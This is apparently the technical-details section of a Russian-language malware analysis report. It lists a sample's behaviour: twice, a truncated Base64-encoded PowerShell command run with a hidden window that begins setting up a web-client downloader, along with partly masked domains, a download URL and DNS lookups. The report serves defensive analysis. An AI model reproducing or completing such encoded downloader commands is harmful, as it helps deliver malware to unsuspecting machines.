Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABWAF8AXwAyADQANwAxAD0AKAAnAHUAJwArACcAXwAzACcAKwAnADQAOAA2AF8AJwApADsAJABHADYAXwAwAF8AXwA9AG4AZQB3AC0AbwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ADsAJABzADAAMgA5ADQANwA1AD0AKAAnAG...
- 'tj####inings.com':80
- 'di###.center':80
- 'di###center.com':443
- http://di###.center/2OTZiNbRxnb2
- 'di###center.com':443
- DNS ASK su#####iatduchung.com
- DNS ASK tj####inings.com
- DNS ASK so##.lpbes.org
- DNS ASK di###.center
- DNS ASK di###center.com
- DNS ASK ge###tronics.in
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABWAF8AXwAyADQANwAxAD0AKAAnAHUAJwArACcAXwAzACcAKwAnADQAOAA2AF8AJwApADsAJABHADYAXwAwAF8AXwA9AG4AZQB3AC0AbwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ADsAJABzADAAMgA5ADQANwA1AD0AKAAnAG...' (со скрытым окном)